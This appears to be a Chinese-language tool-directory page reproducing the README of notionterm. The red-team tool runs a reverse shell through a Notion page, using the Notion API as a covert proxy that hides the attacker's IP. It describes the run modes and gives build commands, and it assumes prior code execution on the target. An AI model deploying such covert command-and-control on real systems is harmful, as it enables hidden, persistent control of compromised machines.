Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/ariary/notionterm
Payload生成漏洞利用逆向工程Web安全命令与控制红队
GitHubariary/notionterm

notionterm

将反向Shell嵌入Notion页面,利用Notion API作为代理,实现隐蔽的远程Shell会话,并通过加密和认证通信支持红队行动。

查看仓库
13715923年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

notionterm

在 Notion 页面中嵌入反向Shell。
边记笔记边攻击


demo


适用 ➕:

  • 隐藏攻击者反向Shell的IP (攻击者和目标机器之间无直接交互,通过Notion作为托管反向Shell的代理)
  • 在报告中快速演示/插入PoC
  • 高可用且可共享的反向Shell(桌面、浏览器、移动端)
  • 加密和认证的远程Shell

不适用 ➖:

  • 长时间交互式Shell会话(参见 tacos)

为什么? 🤔

重点在于制作一个既有趣又实用的工具,但并非旨在成为渗透测试人员武器库中反向Shell的终极解决方案。

怎么做? 🤷‍♂️

像往常一样使用Notion,并在目标上运行notionterm。

要求 🖊️

  • Notion软件及API密钥
  • 允许目标到Notion域名的HTTP通信
  • 在目标上预先获得RCE

大致灵感来源于 OffensiveNotion 和 notionion 的伟大创意!

快速上手

学习命令和参数太无聊了:使用 wrap-notionterm.sh

快速启动

🏗️ 设置

  1. 创建一个页面,并为集成API密钥赋予页面写入权限。
  2. 构建notionterm并将其传输到目标机器(参见构建)

👟 运行

运行notionterm有三种主要模式:

"普通"模式
获取终端、停止/恢复等...
notionterm [flags]
通过按钮小部件启动Shell:打开ON,执行反向Shell操作,关闭OFF暂停,再次打开ON恢复等...
"服务器"模式
方便在任何页面嵌入notionterm
notionterm --server [flags]
在任何页面中通过创建嵌入块,使用包含页面ID的URL(CTRL+L获取)启动Shell会话:https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]。
light模式
仅从目标向Notion发送HTTP流量
notionterm light [flags]

构建

由于notionterm旨在目标机器上运行,因此必须针对目标环境进行构建。

根据目标要求设置环境变量:

root@kitploit:~
GOOS=[windows/linux/darwin]

简单构建

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

你需要通过环境变量(NOTION_TOKEN和NOTION_PAGE_URL)或命令行标志(--token和--page-url)设置API密钥和Notion页面URL。

"全包含"构建

直接将Notion集成API令牌和Notion页面URL嵌入二进制文件中。⚠️注意:任何能访问该二进制文件的人都能提取令牌。出于安全原因,请不要共享,并在使用后移除。

设置相应的环境变量:

root@kitploit:~
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

然后构建:

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS
下载工具